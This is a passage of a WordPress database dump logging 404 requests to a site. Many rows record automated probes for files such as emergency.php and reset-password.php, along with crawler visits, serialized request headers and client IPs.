Firefox/19.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631258285.4029328823089599609375;s:12:\"REQUEST_TIME\";i:1631258285;}}','notice','2021-09-10 07:18:07','2021-09-10 07:18:05',72612160,72695272,'https://zphiblgz.org/emergenc.php',1,0,'45.153.160.132'),(96910,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631258281.5282230377197265625;s:12:\"REQUEST_TIME\";i:1631258281;}}','notice','2021-09-10 07:18:03','2021-09-10 07:18:01',72610976,72693984,'https://zphiblgz.org/wp-pass.php',1,0,'45.153.160.132'),(96908,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631258262.91135501861572265625;s:12:\"REQUEST_TIME\";i:1631258262;}}','notice','2021-09-10 07:17:45','2021-09-10 07:17:43',72612104,72695192,'https://zphiblgz.org/emer.php',1,0,'89.163.143.8'),(96909,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631258277.183207035064697265625;s:12:\"REQUEST_TIME\";i:1631258277;}}','notice','2021-09-10 07:17:59','2021-09-10 07:17:57',72612080,72695176,'https://zphiblgz.org/res.php',1,0,'45.153.160.132'),(96907,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631258249.6110579967498779296875;s:12:\"REQUEST_TIME\";i:1631258249;}}','notice','2021-09-10 07:17:31','2021-09-10 07:17:29',72612152,72695264,'https://zphiblgz.org/newpass.php',1,0,'45.153.160.137'),(96905,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631258231.6205348968505859375;s:12:\"REQUEST_TIME\";i:1631258231;}}','notice','2021-09-10 07:17:13','2021-09-10 07:17:11',72612160,72695272,'https://zphiblgz.org/passwords.php',1,0,'45.153.160.131'),(96906,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631258236.141683101654052734375;s:12:\"REQUEST_TIME\";i:1631258236;}}','notice','2021-09-10 07:17:18','2021-09-10 07:17:16',72612224,72695336,'https://zphiblgz.org/newpassword.php',1,0,'45.153.160.131'),(96904,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631258227.4746229648590087890625;s:12:\"REQUEST_TIME\";i:1631258227;}}','notice','2021-09-10 07:17:09','2021-09-10 07:17:07',72612328,72695416,'https://zphiblgz.org/change-password.php',1,0,'5.183.209.217'),(96902,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631258169.39832401275634765625;s:12:\"REQUEST_TIME\";i:1631258169;}}','notice','2021-09-10 07:16:11','2021-09-10 07:16:09',72612272,72695376,'https://zphiblgz.org/reset-password.php',1,0,'45.153.160.140'),(96903,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631258223.7141249179840087890625;s:12:\"REQUEST_TIME\";i:1631258223;}}','notice','2021-09-10 07:17:05','2021-09-10 07:17:04',72611136,72694120,'https://zphiblgz.org/change_password.php',1,0,'5.183.209.217'),(96900,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631258161.7976329326629638671875;s:12:\"REQUEST_TIME\";i:1631258161;}}','notice','2021-09-10 07:16:03','2021-09-10 07:16:02',72612152,72695264,'https://zphiblgz.org/reset-pass.php',1,0,'45.153.160.140'),(96901,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631258165.897602081298828125;s:12:\"REQUEST_TIME\";i:1631258165;}}','notice','2021-09-10 07:16:07','2021-09-10 07:16:06',72612248,72695352,'https://zphiblgz.org/reset_password.php',1,0,'45.153.160.140'),(96899,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631258157.6334159374237060546875;s:12:\"REQUEST_TIME\";i:1631258157;}}','notice','2021-09-10 07:15:59','2021-09-10 07:15:57',72612160,72695272,'https://zphiblgz.org/reset_pass.php',1,0,'37.123.163.58'),(96898,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631258148.07063007354736328125;s:12:\"REQUEST_TIME\";i:1631258148;}}','notice','2021-09-10 07:15:50','2021-09-10 07:15:48',72611072,72694072,'https://zphiblgz.org/resetpassword.php',1,0,'159.89.174.9'),(96897,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631258133.59251499176025390625;s:12:\"REQUEST_TIME\";i:1631258133;}}','notice','2021-09-10 07:15:35','2021-09-10 07:15:33',72610984,72693992,'https://zphiblgz.org/resetpass.php',1,0,'185.31.175.220'),(96895,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631258125.8092300891876220703125;s:12:\"REQUEST_TIME\";i:1631258125;}}','notice','2021-09-10 07:15:27','2021-09-10 07:15:26',72612104,72695192,'https://zphiblgz.org/pass.php',1,0,'205.185.120.173'),(96896,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631258129.1892158985137939453125;s:12:\"REQUEST_TIME\";i:1631258129;}}','notice','2021-09-10 07:15:31','2021-09-10 07:15:29',72612248,72695352,'https://zphiblgz.org/changepassword.php',1,0,'185.220.102.251'),(96894,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631258121.6778209209442138671875;s:12:\"REQUEST_TIME\";i:1631258121;}}','notice','2021-09-10 07:15:23','2021-09-10 07:15:21',72610984,72693992,'https://zphiblgz.org/password.php',1,0,'185.220.100.241'),(96892,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631258111.2910449504852294921875;s:12:\"REQUEST_TIME\";i:1631258111;}}','notice','2021-09-10 07:15:13','2021-09-10 07:15:11',72610928,72693944,'https://zphiblgz.org/change.php',1,0,'91.219.237.21'),(96893,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631258116.4226939678192138671875;s:12:\"REQUEST_TIME\";i:1631258116;}}','notice','2021-09-10 07:15:18','2021-09-10 07:15:16',72612160,72695272,'https://zphiblgz.org/emergency.php',1,0,'109.70.100.28'),(96891,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631258077.0792119503021240234375;s:12:\"REQUEST_TIME\";i:1631258077;}}','notice','2021-09-10 07:14:39','2021-09-10 07:14:37',72629064,72712080,'https://zphiblgz.org/reset.php',1,0,'185.220.100.243'),(96890,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4089.0 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631254094.8549759387969970703125;s:12:\"REQUEST_TIME\";i:1631254094;}}','notice','2021-09-10 06:08:17','2021-09-10 06:08:15',72690456,72774192,'http://zphiblgz.org/scholarship/application/',1,0,'1.169.89.210'),(96889,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:11:\"HTTP_ACCEPT\";s:47:\"text/html,application/xhtml+xml,application/xml\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:68:\"Buck/2.2; (+https://app.hypefactors.com/media-monitoring/about.html)\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631249699.5105769634246826171875;s:12:\"REQUEST_TIME\";i:1631249699;}}','notice','2021-09-10 04:55:01','2021-09-10 04:54:59',72603848,72687616,'http://zphiblgz.org/application',1,0,'18.212.198.22'),(96888,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631248458.6453859806060791015625;s:12:\"REQUEST_TIME\";i:1631248458;}}','notice','2021-09-10 04:34:20','2021-09-10 04:34:18',72175584,72274880,'https://zphiblgz.org/scholarship/application/recommendation/',1,0,'207.46.13.27'),(96887,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:17:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:78:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631248437.9803059101104736328125;s:12:\"REQUEST_TIME\";i:1631248437;}}','notice','2021-09-10 04:33:59','2021-09-10 04:33:58',72613520,72695896,'https://zphiblgz.org/cache.php',1,0,'185.191.34.215'),(96885,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:9:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631247498.367578983306884765625;s:12:\"REQUEST_TIME\";i:1631247498;}}','notice','2021-09-10 04:18:20','2021-09-10 04:18:18',72627824,72711592,'http://zphiblgz.org/wordpress/',1,0,'85.236.156.161'),(96886,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:17:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:78:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631248438.2684700489044189453125;s:12:\"REQUEST_TIME\";i:1631248438;}}','notice','2021-09-10 04:33:59','2021-09-10 